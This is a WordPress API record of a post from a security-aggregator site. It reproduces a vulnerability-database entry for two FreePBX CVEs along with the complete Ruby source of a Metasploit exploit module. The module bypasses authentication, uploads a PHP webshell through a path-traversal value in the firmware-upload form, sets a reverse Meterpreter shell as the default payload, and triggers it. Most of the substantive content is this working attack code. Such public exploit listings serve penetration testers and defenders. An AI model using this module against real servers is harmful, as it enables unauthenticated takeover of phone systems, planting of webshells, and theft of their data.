{"id":37954,"date":"2026-01-28T13:46:33","date_gmt":"2026-01-28T13:46:33","guid":{"rendered":"http:\/\/localhost\/?p=37954"},"modified":"2026-01-28T13:46:33","modified_gmt":"2026-01-28T13:46:33","slug":"freepbx-firmware-file-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=37954","title":{"rendered":"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD-"},"content":{"rendered":"

{“lastseen”:”2026-01-28T19:28:08″,”description”:”The FreePBX versions prior to 16.0.44,16.0.92 and 17.0.6,17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61678, in the context of this module. The versions before 16.0.44 and 17.0.23 are vulnerable to CVE-2025-66039,…”,”published”:”2026-01-28T19:00:04″,”modified”:”2026-01-28T19:00:04″,”type”:”metasploit”,”title”:”FreePBX firmware file upload”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-61678″,”CVE-2025-66039″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Exploit::Remote::HttpClient\\n include Msf::Exploit::FileDropper\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘FreePBX firmware file upload’,\\n ‘Description’ =\\u003e %q{\\n The FreePBX versions prior to 16.0.44,16.0.92 and 17.0.6,17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61678, in the context of this module. The versions before 16.0.44 and 17.0.23 are vulnerable to CVE-2025-66039, while versions before 16.0.92 and 17.0.6 are vulnerable to CVE-2025-61678. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter allows unrestricted file uploads via firmware upload, including path traversal. These vulnerabilities allow unauthenticated remote code execution by bypassing authentication and placing a webshell in the web server’s directory.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Noah King’, # research\\n ‘msutovsky-r7’ # module\\n ],\\n ‘References’ =\\u003e [\\n [ ‘CVE’, ‘2025-66039’], # Authentication Bypass\\n [ ‘CVE’, ‘2025-61678’], # File Upload and Path Traversal\\n [ ‘URL’, ‘https:\/\/horizon3.ai\/attack-research\/the-freepbx-rabbit-hole-cve-2025-66039-and-others\/’]\\n ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Targets’ =\\u003e [\\n [\\n ‘PHP’,\\n {\\n ‘Platform’ =\\u003e ‘php’,\\n ‘Arch’ =\\u003e ARCH_PHP,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘php\/meterpreter\/reverse_tcp’ },\\n ‘Type’ =\\u003e :php\\n }\\n ]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-12-11’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘USERNAME’, [true, ‘A valid FreePBX user’]),\\n ]\\n )\\n end\\n\\n def check\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(‘admin’, ‘config.php’),\\n ‘method’ =\\u003e ‘GET’\\n })\\n\\n if (res\\u0026.code == 401 \\u0026\\u0026 res.body.include?(‘FreePBX’)) ||\\n (res.code == 500)\\n return CheckCode::Detected(‘The FreePBX with Webserver authentication mode detected’)\\n end\\n\\n CheckCode::Safe(‘Webserver authorization mode is not set’)\\n end\\n\\n def get_session_cookie\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(‘admin’, ‘config.php’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘headers’ =\\u003e { ‘Authorization’ =\\u003e basic_auth(datastore[‘USERNAME’], Rex::Text.rand_text_alphanumeric(6)) },\\n ‘keep_cookies’ =\\u003e true\\n })\\n\\n fail_with(Failure::UnexpectedReply, ‘Received unexpected reply’) unless res\\u0026.code == 401\\n\\n fail_with(Failure::NotVulnerable, ‘Target might not be vulnerable to authentication bypass’) unless res.get_cookies\\n end\\n\\n def upload_webshell\\n @target_payload_file_name = %(#{Rex::Text.rand_text_alphanumeric(8).downcase}.php)\\n @target_dir = Rex::Text.rand_text_alphanumeric(8).downcase\\n\\n form_data = Rex::MIME::Message.new\\n\\n form_data.add_part(SecureRandom.uuid, nil, nil, ‘form-data; name=\\”dzuuid\\”‘)\\n form_data.add_part(‘0’, nil, nil, ‘form-data; name=\\”dzchunkindex\\”‘)\\n form_data.add_part(payload.encoded.length.to_s, nil, nil, ‘form-data; name=\\”dztotalfilesize\\”‘)\\n form_data.add_part(‘2000000’, nil, nil, ‘form-data; name=\\”dzchunksize\\”‘)\\n form_data.add_part(‘1’, nil, nil, ‘form-data; name=\\”dztotalchunkcount\\”‘)\\n form_data.add_part(‘0’, nil, nil, ‘form-data; name=\\”dzchunkbyteoffset\\”‘)\\n form_data.add_part(\\”..\/..\/..\/var\/www\/html\/#{@target_dir}\\”, nil, nil, ‘form-data; name=\\”fwbrand\\”‘)\\n form_data.add_part(‘1’, nil, nil, ‘form-data; name=\\”fwmodel\\”‘)\\n form_data.add_part(‘1’, nil, nil, ‘form-data; name=\\”fwversion\\”‘)\\n form_data.add_part(payload.encoded, ‘application\/octet-stream’, nil, %(form-data; name=\\”file\\”; filename=\\”#{@target_payload_file_name}\\”))\\n\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(‘admin’, ‘ajax.php’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘headers’ =\\u003e {\\n ‘Authorization’ =\\u003e basic_auth(Rex::Text.rand_text_alphanumeric(6), Rex::Text.rand_text_alphanumeric(6)),\\n ‘Referer’ =\\u003e full_uri(normalize_uri(‘admin’, ‘config.php’))\\n },\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{form_data.bound}\\”,\\n ‘vars_get’ =\\u003e { ‘module’ =\\u003e ‘endpoint’, ‘command’ =\\u003e ‘upload_cust_fw’ },\\n ‘data’ =\\u003e form_data.to_s\\n })\\n\\n fail_with(Failure::PayloadFailed, ‘Failed to upload webshell’) unless res\\u0026.code == 500\\n register_dir_for_cleanup(\\”..\/#{@target_dir}\\”)\\n end\\n\\n def trigger_payload\\n send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(@target_dir, @target_payload_file_name),\\n ‘method’ =\\u003e ‘GET’\\n })\\n end\\n\\n def exploit\\n print_status(‘Trying to bypass authentication…’)\\n get_session_cookie\\n\\n print_good(‘Bypass successful, trying upload webshell…’)\\n\\n upload_webshell\\n\\n print_good(‘Upload successful, triggering…’)\\n\\n trigger_payload\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/unix\/http\/freepbx_firmware_file_upload.rb”,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/unix\/http\/freepbx_firmware_file_upload\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-28T19:28:08″,”description”:”The FreePBX versions prior to 16.0.44,16.0.92 and 17.0.6,17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61678, in the context of this module. The versions…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,169,13,7,11,5],"class_list":["post-37954","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nFreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=37954\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-28T19:28:08″,”description”:”The FreePBX versions prior to 16.0.44,16.0.92 and 17.0.6,17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61678, in the context of this module. The versions...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=37954\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-28T13:46:33+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37954#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37954\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD-\",\"datePublished\":\"2026-01-28T13:46:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37954\"},\"wordCount\":979,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37954#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37954\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37954\",\"name\":\"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-28T13:46:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37954#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37954\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37954#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=37954","og_locale":"en_US","og_type":"article","og_title":"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD- zero redgem","og_description":"{“lastseen”:”2026-01-28T19:28:08″,”description”:”The FreePBX versions prior to 16.0.44,16.0.92 and 17.0.6,17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61678, in the context of this module. The versions...","og_url":"https:\/\/zero.redgem.net\/?p=37954","og_site_name":"zero redgem","article_published_time":"2026-01-28T13:46:33+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=37954#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=37954"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD-","datePublished":"2026-01-28T13:46:33+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=37954"},"wordCount":979,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=37954#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=37954","url":"https:\/\/zero.redgem.net\/?p=37954","name":"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-28T13:46:33+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=37954#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=37954"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=37954#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"FreePBX firmware file upload_MSF:EXPLOIT-UNIX-HTTP-FREEPBX_FIRMWARE_FILE_UPLOAD-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37954","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=37954"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37954\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=37954"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=37954"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=37954"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}